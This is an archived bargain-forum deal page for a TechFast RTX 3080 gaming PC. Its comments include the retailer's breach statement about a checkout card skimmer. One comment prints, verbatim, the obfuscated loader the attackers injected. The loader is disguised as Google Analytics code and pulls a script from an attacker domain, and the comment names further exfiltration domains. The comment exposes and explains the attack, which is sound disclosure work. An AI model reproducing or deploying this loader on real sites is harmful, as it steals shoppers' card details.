• expired

i7 10700F RTX 3080 Gaming PC with B560M, 120mm AIO, 16GB 3200MHz, 480GB SSD, 750W G PSU: $2688 + Post @ TechFast (Ship July)

678
10700F-3080-EOFYS

Hi folks, as promised, i7 PC to round out the 3080 offerings for our EOFYS, 10700F and 10700KF available. Non-LHR cards only are being used.

My statement regarding the site issue earlier today.

Intel Core i7 10700F | RTX 3080 10GB Gaming PC: $2688 after 10700F-3080-EOFYS

  • Core i7 10700F 8c/16t processor [10700KF upgrade available]
  • 120mm AIO cooler (brand/model may vary)
  • RTX 3080 10GB graphics card [brand/model may vary, all non-LHR]
  • Gigabyte B560M DS3H (various upgrades available)
  • 16GB 3200MHz RAM (brand/model may vary; upgrades available)
  • 480GB 2.5" SSD (brand/model may vary; upgrade available)
  • 750W 80 Plus Gold PSU (Gigabyte and MSI being used, request preference and we will do our best to facilitate without guaranteeing)
  • Lance-V RGB RGB ATX case (MSI MPG Gungnir 111R upgrade pictured, $79)

Other EOFYS deals

3080 PCs

Updates:

  • 3070 big batch arrived - overdue systems have been shipping all week and continue to. Thanks for your patience.
  • 3070 Ti shipping from this week onwards, on time
  • Most 3080 June have shipped and balance will shortly, on time; Pre-order/July cards inbound on time
  • 2700X CPUs in-bound - apologies for supplier delay here. Stuck in processing but freed and on the way now.

Cheers
Luke

Related Stores

TechFast
TechFast

closed Comments

  • +45

    WHAT YOU NEED TO KNOW:

    • At 6:21am on 23/06/2021, an unauthorised party leveraged a third-party plugin script on the TechFast website Checkout page and inserted malicious code. This code placed a module on the Checkout page of the website, which appeared when the Pay with Credit Card - SecurePay radial button was clicked.

    • The malicious module contained fields to enter the credit card number, expiry data, and CVC. If data (including credit card data) was entered into any these fields, the data was immediately sent off the TechFast website. An image of the module as it appeared on the site is here:

    ISSUE RESOLUTION:

    • The issue was fully resolved at 2:21pm on 24/06/2021. The risk to our customers ended at this point.
    • We have contacted and notified the Australian Cyber Security Centre (ACSC), are awaiting further instruction, and will fully comply with any further requirements from them and other agencies if required.

    WHAT YOU SHOULD DO:

    • If you entered your card details into the malicious module at any point, even if you did not continue or complete the transaction via the regular Checkout method on our website, it is extremely likely that your credit card details have been compromised. We recommend that you contact your financial institution to check that no unauthorised transactions have been made, and cancel your credit card. If unauthorised transactions have occurred on your card, you need to contact your bank and initiate a chargeback.
    • We understand and acknowledge the inconvenience of this situation. We are willing to reasonably compensate customers who need to initiate a chargeback with their bank, for their time in resolving the inconvenience caused. Please email [email protected] to initiate this process.

    IMPORTANT NOTES:

    • The malicious code was only able to access data entered into the fields within the module; no other data was affected, on the Checkout page or any other pages.
    • If you followed the regular Checkout process, which involves clicking the Pay with Credit Card - SecurePay radial button, then clicking the Continue button at the bottom of the page, and entering your payment details on the Payment page, you are not affected. All data entered here was unaffected by the malicious activity.
    • If you paid by Direct Deposit or Zip between 6:21am on 23/06/2021 and 2:21pm on 24/06/2021, and did not enter details into the malicious module, you are not affected.
    • If you visted, interacted with or purchased from our website via any payment method including Credit Card, outside of these times, you are not affected.
    • We do not store any financial information from any customers. The customer information we do store includes names, addresses, email address and phone numbers, which was not compromised.

    FUTURE RESOLUTION:

    • To prevent this occuring in future, we have implemented and will continue to implement several security upgrades. In any event, we would always cover any loss that occurred to our customers via a Cyber Security threat.

    • We have taken this extremely seriously and to address any comment on our approach to this scenario, upon investigation this afternoon, I can confirm that a user posted a comment regarding this on OzBargain at 07:48am on 23/06. As it was on a previous deal post, I didn't see it, as evidenced by me replying on the 24/06 saying that our webmaster was looking into it. We have acted as quickly as we can, notified all relevant authorities, and ensured our customer communication is accurate and consistent.

    • Affected customers will be contacted via email following this post.

    • Hey Luke thanks for the clarification. Note the site has warning switch on still see here https://nimb.ws/2h4qla

      • Thanks. It is unrelated, but the webmaster is onto it. Timing isn't amazing.

        • Yes, I can see what it is and now warnings have been turned off.. all good better knowing now.

    • +3

      I'm very interested in buying a system but the breach has me very worried. Will you be offering paypal as an alternative payment method?

      • +1

        I can understand your concern. However, the issue was not related to the payment methods themselves, rather the radial buttons on the page prior to that. All payments were and are secure. We're not activating PayPal at this time but I will raise it with senior management at the next review.

        • Thanks luke,

          I'm not as tech savvy so if you could bear with me…is an audit of the website done to look for any malware or anything to that effect? - i.e. is there any chance that there is lingering malicious code?

          • @Doey21: Yes, we conducted a full sweep, have implemented several significant security enhancements, and will continue to monitor the site with best practice, automated security features in place.

    • +3

      So that is the official statement. Personally and on behalf of TechFast, we sincerely and unreservedly apologise for any and all inconvenience and worry caused. I understand the damage this may have caused, and will work hard to restore any lost faith in what we do. We got screwed over, but are doing everything we can to fix it.

      • +11

        Man don't even sweat it Luke. These people that are busting your balls are the typical internet trolls one expects to see during this kind of incident. They were never going to be customers and are just revelling in the chance to grab a pitch fork and be jerks about it. Bigger companies than Techfast have been hacked and quickly forgiven and ironically these same trolls would be posting their negative nancy bs on the devices of companies that had data breaches.

        • +3

          I don't begrudge anyone's comments here. It's all been pretty reasonable really. It obviously took some time for us to deal with, and respond to, so commentary in between was inevitable.

      • +1

        We are willing to reasonably compensate customers who need to initiate a chargeback with their bank, for their time in resolving the inconvenience caused. Please email [email protected] to initiate this process.

        Shit happens. It's the exact reason why a credit card has an expiry date and can be easily cancelled and re-issued.

        I don't see a reason for anyone to seek compensation. If anyone is so entitled that they believe no inconvenience should ever fall upon them in their lives, they need to get off their keyboards and step out the front door.

        You have provided tens, if not hundreds of customers with reasonably priced RTX30 machines where they would otherwise have had to rely on scalper pricing.

    • +2

      Shit happen but luckily this has been dealt with.

      Give our boy @Homealone the MVP award, dude is a fking legend mate!

      • To trail off that this website is extremely useful for checking websites and showed the exact malware and it's code which Homealone disclosed at the time.

    • +2

      fortunately im a tightass and did direct deposit because of the 1.5% surcharge on CC.

      • +1

        No true ozb users would have been affected due to this ;)

    • +2

      If you bring back sub 2k 3080 PC's ozb MIGHT forgive u ;)

  • +1

    PCPP, as always using the lowest prices on that site for exact part or lowest priced equivalent. Not a perfect comparison given retail price of 3080, but a rough guide. PCPartPicker Part List

    Type Item Price
    CPU Intel Core i7-10700F 2.9 GHz 8-Core Processor $349.00 @ Amazon Australia
    CPU Cooler ID-COOLING AURAFLOW X 120 74.5 CFM Liquid CPU Cooler $75.00 @ PLE Computers
    Motherboard Gigabyte B560M DS3H Micro ATX LGA1200 Motherboard $129.00 @ Umart
    Memory PNY XLR8 16 GB (2 x 8 GB) DDR4-3200 CL16 Memory $119.00 @ Storm Computers
    Storage Kingston A400 480 GB 2.5" Solid State Drive $61.89 @ Amazon Australia
    Video Card EVGA GeForce RTX 3080 10 GB XC3 ULTRA GAMING Video Card $2499.00 @ Scorptec
    Case MSI MAG FORGE 100R ATX Mid Tower Case $69.00 @ Centre Com
    Power Supply Gigabyte P GM 750 W 80+ Gold Certified Fully Modular ATX Power Supply $99.00 @ PC Byte
    Prices include shipping, taxes, rebates, and discounts
    Total $3400.89
    Generated by PCPartPicker 2021-06-24 13:34 AEST+1000
    • +2

      Which CPU did you have in mind?

    • 10700F is not crap? lol

      • Paired with a 120 AIO it is.

        • I'm thinking of getting this, what should I change it with??

          • -1

            @Optimus Lime: literally anything. I cant find the dimensions of the case, so not sure what clearance you can get away with. You cant overclock on a 10700 anyways, so it doesnt matter too much but a 120 AIO is useless and loud.

            Any air cooler should do the trick.

            • @ATangk: Ok thanks!

              • @Optimus Lime: That said, the 120aio may work for you, and it’ll come preinstalled. Just monitor your temps and sound and if it’s not good enough, then a noctua or dark rock may help.

  • Possible to pay to get a different case? I need one with 4 SDD and 2 HDD bays.

    • +1

      We offer just the three at this stage, which we buy in bulk to secure stock.

      • Thanks.

  • Which z590 wifi?

    • +1

      Likely Giga UD AC

      • No spdif out :/ thanks for your reply

        • +2

          If you just need spdif a $20 usb soudcard wil do the trick. It just needs to carry the digital signal and not handle any sound processing.

          • @AEKaBeer: How does it work these days? I'm getting old. I'm used to needing Dolby digital live encoding (for games.. Not movies obviously) to send to my amp. I've only ever bought one soundcard.. An essence stx.. But I've learnt my lesson not to do that again since asus makes buggy drivers then ceases support

            I use headphones too but can do that through the amp so don't need good dacs

            • @justtoreply: i dont use any audio stuff come with the mobo anyway. just get anything that uses USB ports, plugs in, there you go. just search for USB to spdif i guess.

              i never use spdif so i don't know. But I do have a good entry audio DAC (schiit fulla4) so I know that you don't always have to rely on the audio stuff comes with the mobo.

  • When do you expect shipping on these units?

    • July, along with the other systems with this batch of GPUs.

      • Hoping that it's early July

  • You reckon there will be another deal with non lhr cards after June 30th Luke? Planing to buy another pc from you guys, but need it for next year.

    • +1

      It will be batch by batch from here. Hopefully, but not definitely.

  • +15

    Is anyone else getting the TROJAN-PSW.SCRIPT.GENERIC detection? Kaspersky blocks me from techfast every time and i'm hesitant to override.
    Malware or 3080, malware or 3080 hmm decisions decisions

    • +1

      Our web team is looking into it

      • +89

        Your website has been hijacked. They have injected malicious code in your Google Analytics code in order to steal credit card details during checkout.

        (function(i,s,o,g,r,a,m){i['Google'+'Analytics'+'Objects']=r;a=s.createElement (g),m=s.getElementsByTagName(g)[0];if(i.location.href.indexOf(i.atob(r)) >0){a.async=1;a.src=''+i.atob(o);r=m.parentNode;r.insertBefore(a,m)}}) (window,document,'Ly9ncmVtbC54eXovd3d3Lmdvb2dsZS1hbmFseXRpY3MuY29tL3RlY2hmYXN0LmNvbS5hdS5qcw==','script','Y'+'2'+'h'+'l'+'Y'+'2'+'t'+'v'+'d'+'X'+'Q'+'=', '//www.google-analytics.com/analytics.js','ga');

        If you Base64 decode Ly9ncmVtbC54eXovd3d3Lmdvb2dsZS1hbmFseXRpY3MuY29tL3RlY2hmYXN0LmNvbS5hdS5qcw== you end up with //greml.xyz/www.google-analytics.com/techfast.com.au.js

        The injected malicious .js file is obfuscated, but after running through jsbeautify you end up with this. https://ghostbin.co/paste/bhc5gs

        There are 3 external URLs being used in this attack.

        greml.xyz - Domain registered on 2 June 2021

        txbor.uno - Domain registered 16 June 2021

        tybrown.club - Domain registered 16 June 2021

        • +1

          Thank you.

        • +34

          I'm a little confused.

          So, Shopback had a security incident where some basic information like email address was taken. They were crucified by a crowd holding flaming torches.

          Techfast had code on their website from a third party that was stealing credit card numbers and nobody has bat an eyelid.

          What.

          How long was the code there for? How many customers were affected? Are you going to contact them?

          What are you doing about this security breach?!

          • +17

            @AaronR: Yeah this is incident response and data breach territory if confirmed. You don't just go "lol fixed" and move on.

            • @whichwhatwho: Where did they laugh about it?

            • +10

              @whichwhatwho: Any company that has turnover over $3m is required to report a data breach to OAIC and customers as soon as they're made aware of the breach. Gotta be done within 72 hours, since people were telling them yesterday they don't have a whole lot of time.

              I'm going to guess with the popularity of $2-3k computers the past few months their turnover is definitely over $3m.

          • +23

            @AaronR:

            How long was the code there for? How many customers were affected?

            At least 25.5 hours and potentially up to 38 hours.

            Looking at Google cached copies of TechFast pages the malicious script:

            • wasn't included at 1:29 AM AEST on 23 June. Anyone who ordered after this time may be affected.
            • was included at 1:57 PM AEST on 23 June. Anyone who ordered after this time is definitely affected
          • +11

            @AaronR: This alone is enough to never buy from this company. This isn't something to take lightly at all.

            • -1

              @shaibankek2: How do you know they are taking it lightly?

              • +3

                @FabMan: "Thanks it has been fixed" and not a huge PSA or something, or even taking the deal down.

          • +4

            @AaronR: Hmm… posting about what may become a legal issue on a public forum before any investigations have been completed? Yep, that makes a lot of sense.

        • +2

          @HomeAlone What a Boss

          Are you only affected if you ordered something? I presume you're OK if you didn't place any order and was just browsing?
          Thanks

          • @Butters:

            Are you only affected if you ordered something?

            You're only affected if you entered your card details, even if you decided not to submit the order at the last minute.

            The script was set up in a way so that the moment someone entered their card number, expiry date and CVV it immediately uploaded those details to 2 different servers.

            I guess the silver lining here is that the attackers didn't seem to be interested in any other details like name, address, phone number, email, etc. although it's possible they could have already just copied the entire customer database if their initial attack vector allowed them that kind of access.

        • +17

          I reported that NOD32 was also blocking access to the techfast site on 23 June and got a very nonchalant response from Luke: https://www.ozbargain.com.au/node/630944?page=1#comment-1064…

          This is extremely concerning. I was on the website as I was very close to making a purchase of the 3070Ti deal. will definitely give it a miss now.

          • +8

            @xyron:

            have let the web team know and it doesn't show up in anything they can find

            That's some web team

          • @xyron: My statement on the situation is here, and includes acknowledgment of your initial post about it. I just didn't see it until today, and had alerted the webmaster to it prior to this comment.

        • +4

          You are the real MVP

        • +5

          Well done on digging this up (also shoutout to @luckduck10).

          @PlagueistheCheap The webteam probably saw the url contained "google analytics" or "techfast" and skimmed over it TBH. Unfortunate. Wonder how they got this malicious code onto the page? Just plain ol' xss? I'll have a skim through the cached version I guess this evening.

          Hopefully these guys do the right thing and inform people of this breach.

          • +4

            @e1ghtgundam: SQL injection. Magento patched this back in 2015.

            • @Clear: Looked like they were running opencart. Mentions of opencart are find in the source, url query strings look similar to an opencart demo, and a cookie called "OCSESSID" is set (and googling tells me it's opencart).

        • +1

          Old mate Homealone being the MVP of the day

        • +2

          And this, folks, is why people who say "I don't need antivirus I just need my brain" are full of shit

          • @m3ndL3: What AV should people be using?

            • +1

              @PlagueistheCheap: I'm no AV expert, so take my word with a grain of salt… but I hear Kaspersky is very good and it has a free version available. And judging by some of the comments here it looks like stopped at least one person here getting their CC number ripped off.

              On a side note, some people say Windows Defender won't slow down your PC because it's part of Windows, and that's just not true - it literally is an AV product (just not a particularly effective one) just like any other.

              • @m3ndL3: So something like kaspersky with windows defender? or not defender at all?

                • +1

                  @PlagueistheCheap: Defender will automatically be disabled if you install any third party AV. You don't want to have 2 running simultaneously as they could conflict (aside from slowing down your PC more).

                  • @m3ndL3: I wasn't aware of that. Would defender have picked up the issue in this case? (,trojan) they really could be anywhere.

                    • +2

                      @PlagueistheCheap: Yes and no. Without throwing the sample against Windows Defender we can't say for certain if it would detect the threat or not. I've previously worked with another anti-virus vendor and even now I still think Windows Defender is an excellent product.

                      Of course different anti-virus programs are subject to everyone's opinion and people have different requirements. Professionally I'd recommend Sophos with Intercept X in some places, while in others I'd recommend Crowdstrike and in other's physical firewall appliances.

    • +1

      Yep…Just tried & I'm getting the Trojan message too & Kaspersky won't let me in…

    • My statement on this situation is here

  • +1

    Any idea on if you’ll still have stock Saturday? Hopefully selling and buying a house in the same day and know mizzo will give anything the tick of approval if cards fall our way lol

    • +5

      Risskkkyyy - Imma come back to see if you can buy this on Saturday. haha

      • Solid reason tho hehe

      • @wakanda I’m here bro and I could buy..
        But given we didn’t sell our unit (passed in well under the top of the range, still 45k less than comparable) and we didn’t buy the house we were looking at (400k over reserve) I reckon floating this passed the boss would quickly see me unemployed lol
        Thanks Luke, I’ll watch on crying from afar

        • +1

          haha thanks for the update, I legit came online to look for this.

          Thinking of buying a 3070 / 3080 system myself but looks like some prices might come down, so just going to chill for a bit and see. Nitro 5 shall suffice for now.

          • @TChalla: Yeh for about 6m I was thinking a 3070 but seeing some ok 3080 prices is tempting hey

    • +1

      Hard to say mate. Depends on the rate of sale, but may be ok

  • +1

    Thanks Luke. Any 10400f option comparable to the 3600 spec for those on a budget??

    • Will look into it if gpu allows.

  • If you want to run the CPU without power limits (and you should if you want to get the real performance out of the 11700), you'll possibly want to take one of the motherboard upgrades if you do core intensive work like CPU bound games or video transcoding.
    Ref HUB VRM testing:
    https://www.youtube.com/watch?v=HkiTA0XvXUM&t=843s

  • Hey Guys, is this Intel system worth the extra couple hundred or the $2488 AMD system is better value? Just want the system for playing games, not video editing or anything, and have a Xiaomi 34" ultrawide 3440x1440. Thanks :)

  • Luke, would the 5600x deal include the nonLHR 3080s ?

    • The base card, almost certainly yes. Gigabyte is unclear.

  • Will the GPU be triple fan?

    • Yep.

  • any chance we can get GPU by itselfs?

    • I'm actually ordering a system just because my home pc is unstable (causing silent data corruption) so you could potentially take it off my order if techfast can be bothered collecting your money. Otherwise I'll be selling it locally

  • This whole premade debacle that is being fuelled by GPU shortages, really demonstrates that gamers and taste in aesthetics are the gawdiest, ugliest shit that should only appeal to a 6 year old kid loaded with sugar.
    Just give me the smallest (profanity) case that is functional, doesn't have lights and shit all over it and sits there and does its job. Runs cool and isn't noisy. This RGB thing is (profanity) just wtf. Get some tact.

    • +3

      Someone woke up on the wrong side of the bed.

      If you don't like the RGB, unplug the RGB headers. It's not that difficult.

      Go get a cup of tea and chill out a bit.

      1. Smallest case
      2. Runs cool
      3. Isn't noisy

      You can have 2 and 3 at the expense of 1 without dropping more coin on the cooler and higher end board partner card. Smaller cases need some work to manage the heat and therefore sound.

      • Reckon that would be applicable 15 years ago.
        It seems we are still stuck in the ATX days where manufacturers still think we want to fit 6x 3.5 HDD's, an optical drive and a bunch of expansion cards into a big box that needs massive amounts of air circulated around. PC's should be aiming to come down to the Xbox/Playstation formfactors.

    • +9

      lol who died and made you the king of aesthetics. people like different things. get over it. if you don't like it don't buy

      • -5

        Found the guy with the RGB fans. You know, the ones that all look the same as each other.

        • +9

          Yeah you found me. I have RGB fans in my existing PC and I bought the 3070ti Techfast deal that also have them. I like RGB fans and I don't care if a billion other people have them or if no one does. I'll buy them because I like them and no one is gonna be able to shame me out of liking something. But hey, hope you got to feel superior by crapping on something many others like, flexing how unique you are and how great your taste is. You must be such a person of culture.

        • Yeah hurr durr black pc something something…

  • +11

    Hi Luke, I don’t know what happening in your team. However, I requested the postage refund for local pickup in May and followed up 3 times and still didn’t get my postage refund. Last time I followed up on 19/06/2021 and didn’t even get a response this time. So disappointed. Can’t imagine if something goes wrong with the pc, how difficult it will to get support from your team.

    • +11

      Well if what I read up above is true, they had malicious code on their website possibly stealing credit card info and haven't seemed to do much about it. I'm not sure support is something to expect from this lot.

        • +16

          Take everything offline whilst they conduct a Root cause analysis.
          Mitigate the threat from reoccurring.
          Send out communications to all people who might have been impacted.
          Report to the OAIC of a notifiable data breach.
          Apologise.

    • +3

      I'll get this sorted for you and have PMd you.

      • +2

        Thanks Luke. I know once Luke is here, the problem gone. I can confirm I have received the postage refund. Thanks again for this.

  • Hi Luke, based on the update where it states that 3070 cards have arrived, when should I be expecting the PC to be dispatched (ordered at the start of June)? Thanks for any feedback in advance.

  • +9

    Malicious code that steals your credit card when purchasing? No thanks.

  • -1

    Warning: unlink(/Sites/storage_techfast_au/cache/cache.catalog.language.1624519795): No such file or directory in /Sites/techfast.com.au/system/library/cache/file.php on line 68

  • why is this so cheap? anywhere else like wave 3080 pcs are minimum 4 grand?

    • +13

      Because for every one they sell, they get free credit card info.

  • +7

    Wow, ozbargain just turned against Techfast in a blink of an eye.

Login or Join to leave a comment